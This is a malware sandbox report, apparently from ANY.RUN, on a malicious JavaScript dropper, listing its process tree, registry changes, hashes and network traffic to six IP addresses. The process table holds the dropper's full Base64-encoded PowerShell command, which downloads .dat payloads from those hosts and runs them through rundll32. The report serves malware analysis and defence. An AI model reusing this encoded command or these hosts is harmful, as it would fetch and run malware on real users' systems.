File name: | DETAILSS[nc3].js |
Full analysis: | https://app.any.run/tasks/6e020383-47dc-4bcb-b1f4-c702d418b7a5 |
Verdict: | Malicious activity |
Analysis date: | March 31, 2023, 23:47:47 |
OS: | Windows 10 Professional (build: 19044, 64 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 085CE0466ED3F90300218734291F616F |
SHA1: | 84B7E7B565C02042E1E82D458EA2AED3596D7B66 |
SHA256: | DF56FA2455A4934B13F052EE99D6DDF07E0C8E9A0E574299F4BA6EB471A7751A |
SSDEEP: | 1536:FmLC7X6Ss/YPqBhImXFb/S54A2e6R3rlBgj9jk1yiG80tqf0pOERwULD9xMS4h/4:FmLC7X6Ss/YPqBhImXFb/S54A2e6R3rk |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5364 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\DETAILSS[nc3].js" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
648 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAVgBlAHIAYgBsAGUAcwBzAEMAdQBjAHUAbABpAG4AZQAgAD0AIAAoACIAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADQAMQAuADIAMAA1AC8AagBkAGwAZwAwAFcATwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADQAMQAuADkANAAuADgANgAuADkAMAAvAFMASQBlAHoAMQBLAGQAbwByAGsAVwBvAC4AZABhAHQALABoAHQAdABwADoALwAvADkANAAuADEAMwAxAC4AMQAxADcALgAxADEAMQAvAEwARgBrAFkAdwBmAFgAcgBHAGsAWABYAC4AZABhAHQALABoAHQAdABwADoALwAvADIAMQA2AC4AMQA0ADYALgAyADUALgAxADIAOQAvAHcARAB0AE4ATAA2AGQALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AMQAwADQALgAyADIANQAuADEAMgA5AC4AMQAxADQALwA4AHgARABXAEQANgBiAFkAUwBVAFAAQwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADkAOQAuADIANAA3AC4AMwAwAC4AMgAwADMALwBtADIANwBVAHMAMQBUAHQAUgBjAGYAQwAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHUAbgBvAHIAZABpAG4AYQB0AGUAIABpAG4AIAAkAFYAZQByAGIAbABlAHMAcwBDAHUAYwB1AGwAaQBuAGUAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAHUAbgBvAHIAZABpAG4AYQB0AGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADgAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAFMAdQBjAGMAdQBzAHMAaQBuAGcALgBSAGUAYQBkAG0AaQB0AFUAbgBoAGUAbABtAGUAZAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFMAdQBjAGMAdQBzAHMAaQBuAGcALgBSAGUAYQBkAG0AaQB0AFUAbgBoAGUAbABtAGUAZAApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABTAHUAYwBjAHUAcwBzAGkAbgBnAC4AUgBlAGEAZABtAGkAdABVAG4AaABlAGwAbQBlAGQALABYADUANQA1ADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA=" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
4192 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
2836 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
(PID) Process: | (5364) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (5364) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (5364) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (5364) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (648) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (648) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (648) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (648) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
648 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fgrfppkf.qoe.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
648 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vdtripa4.1e1.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
648 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:3107623B43F783E7C296C2ED4A31BC7F | SHA256:E40B62B010330546263C5AB6615A69ABEE011D5C7CF65AD7CF29CAD97DD3D8A5 | |||
648 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | text | |
MD5:1ACADA3C580D8D7AB5D8C84B136C78F1 | SHA256:1D4C4668DC6191C5C0B132D76740E086EC867304A736C82CA26AC5B026295207 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
648 | powershell.exe | GET | 404 | 94.131.117.111:80 | http://94.131.117.111/LFkYwfXrGkXX.dat | US | xml | 341 b | malicious |
648 | powershell.exe | GET | 404 | 199.247.30.203:80 | http://199.247.30.203/m27Us1TtRcfC.dat | NL | xml | 341 b | malicious |
648 | powershell.exe | GET | 404 | 104.225.129.114:80 | http://104.225.129.114/8xDWD6bYSUPC.dat | US | xml | 341 b | malicious |
648 | powershell.exe | GET | 404 | 85.239.41.205:80 | http://85.239.41.205/jdlg0WO.dat | CY | xml | 341 b | malicious |
648 | powershell.exe | GET | 404 | 141.94.86.90:80 | http://141.94.86.90/SIez1KdorkWo.dat | FR | xml | 341 b | malicious |
648 | powershell.exe | GET | 404 | 216.146.25.129:80 | http://216.146.25.129/wDtNL6d.dat | US | xml | 341 b | malicious |
3128 | slui.exe | POST | — | 52.161.91.37:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | US | — | — | whitelisted |
2836 | slui.exe | POST | — | 52.161.91.37:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | US | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
648 | powershell.exe | 85.239.41.205:80 | — | Cloudlayer8 Limited | CY | malicious |
648 | powershell.exe | 141.94.86.90:80 | — | OVH SAS | FR | malicious |
648 | powershell.exe | 216.146.25.129:80 | — | CLOUDIE-NETWORKS-LLC | US | malicious |
648 | powershell.exe | 104.225.129.114:80 | — | SHOCK-1 | US | malicious |
648 | powershell.exe | 94.131.117.111:80 | — | ZAYO-6461 | US | malicious |
5952 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5288 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1740 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
648 | powershell.exe | 199.247.30.203:80 | — | AS-CHOOPA | NL | malicious |
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
648 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
648 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
648 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
648 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
648 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
648 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |